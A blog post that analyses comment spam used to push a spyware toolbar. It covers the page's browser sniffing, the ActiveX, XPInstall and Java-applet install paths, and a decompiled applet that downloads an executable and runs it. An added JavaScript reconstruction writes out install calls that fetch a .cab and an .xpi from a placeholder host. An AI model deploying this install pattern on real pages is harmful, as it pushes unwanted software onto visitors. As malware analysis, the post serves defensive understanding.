Historically, blog spam has been used to raise search engine rankings. With the recent introduction of the "nofollow" link attribute, however, that avenue of profit has been essentially killed off, so comment spammers are moving on to a new source of income: spyware (phishing and similar schemes will probably follow). While there have been reports of spyware being served through Google's Blogger service, triggered by the "next blog" feature, I haven't yet seen reports of trackback or comment spam doing the same. Well, until now.
What follows is something very interesting. The main download function in this file checks whether the browser is Internet Explorer (with or without SP2) and, separately, whether it is Netscape/Firefox. For IE, an ActiveX control is loaded which presumably downloads and installs the toolbar (I am running Linux, so I can't test it). The downloaded file is called "ysb_regular.cab" and contains a single DLL, "ysbactivex.dll", which is probably the toolbar itself.
Is there an exploit here? I don't see one. After more than adequate warning, Java allowed the user to run arbitrary code, and arbitrary code can do, well, arbitrary things.
What was interesting to me is that, among other things, they use the Firefox/Netscape Install API to try to install it. However, at least on my install of Firefox I had to add the site to the list of allowed sites before the install could even take place, so safeguards are in place even for this.
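To make the browser-sniffing logic of the download function and the two install paths it branches into (the ActiveX route for IE and the XPInstall route for Netscape/Firefox) concrete, here is an added JavaScript example. It is not code from the spam page or from this post: the .cab and .dll names come from the post, but the host, the .xpi file name and the User-Agent tokens it checks (the "SV1" token that IE sends on Windows XP SP2) are assumptions, and the real page's ActiveX CLSID is not reproduced. The `document` and `InstallTrigger` objects are injected so the logic can be run under Node with constructed User-Agent strings.

```javascript
// Added example (not the spam page's own script): browser sniffing of the kind
// the download function performs, and the install path each branch takes.
// File names below come from the post; host, .xpi name and UA tokens are assumed.

const CAB_URL = "http://example.invalid/ysb_regular.cab"; // file name from the post, host assumed
const XPI_URL = "http://example.invalid/ysb_toolbar.xpi"; // assumed: the post names no .xpi

// Classify a User-Agent string into the install path such a page would take.
//   "activex-sp2": IE on Windows XP SP2, which sends the "SV1" token. SP2's
//                  information bar blocks silent ActiveX installs, so the page
//                  has to talk the user into clicking the bar.
//   "activex":     IE without SP2: the classic modal "install this control?" dialog.
//   "xpinstall":   Netscape/Firefox (Gecko) via the XPInstall API.
//   "none":        anything else (Opera pretending to be IE, Konqueror, ...).
function chooseInstallPath(userAgent) {
  const ua = String(userAgent || "");
  const isIE = /MSIE \d+/.test(ua) && !/Opera/.test(ua);
  if (isIE) {
    return /\bSV1\b/.test(ua) ? "activex-sp2" : "activex";
  }
  if (/Gecko\//.test(ua) && /(Firefox|Netscape)\//.test(ua)) {
    return "xpinstall";
  }
  return "none";
}

// Attempt the install. `doc` stands in for `document` and `installTrigger`
// for `window.InstallTrigger`; returns a record of what was attempted.
function runInstaller(userAgent, doc, installTrigger) {
  const path = chooseInstallPath(userAgent);
  switch (path) {
    case "activex-sp2":
    case "activex": {
      // IE: an <object> whose codebase points at the .cab makes IE offer to
      // download the archive and register the DLL inside it. A real page
      // would also set a classid; none is given here because the post's
      // CLSID is not known.
      const obj = doc.createElement("object");
      obj.setAttribute("codebase", CAB_URL);
      doc.body.appendChild(obj);
      return { path, action: "activex-object", target: CAB_URL };
    }
    case "xpinstall": {
      // Firefox/Netscape: InstallTrigger.install() takes a {name: url} map.
      // Unless the site is on the user's allowed-sites list, Firefox refuses
      // and shows its "prevented this site from installing software" bar.
      if (!installTrigger || typeof installTrigger.install !== "function") {
        return { path, action: "none", reason: "no InstallTrigger" };
      }
      installTrigger.install({ "Toolbar": XPI_URL });
      return { path, action: "xpinstall", target: XPI_URL };
    }
    default:
      return { path, action: "none", reason: "unsupported browser" };
  }
}

// Stand-alone demo with constructed User-Agent strings (runs only outside a browser).
if (typeof window === "undefined") {
  const samples = [
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
    "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4",
    "Mozilla/5.0 (compatible; Konqueror/3.4; Linux) KHTML/3.4.0 (like Gecko)",
  ];
  for (const ua of samples) console.log(chooseInstallPath(ua), "<-", ua);
}
```

The point of the split is the one the post makes: on IE the `<object>` element alone is enough to trigger the ActiveX prompt, while on Firefox the `InstallTrigger.install()` call goes nowhere until the user has explicitly whitelisted the site, which is why a Linux/Firefox reader sees only the yellow bar.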
Moving along to the actual Java installer, I uncompressed it and decompiled it with JAD. The installer creates a temporary file, downloads something into it and then executes it. The applet is signed with a certificate issued by Thawte, and I assume that saying "Yes" to the Java warning gives it full permissions to do its dirty work.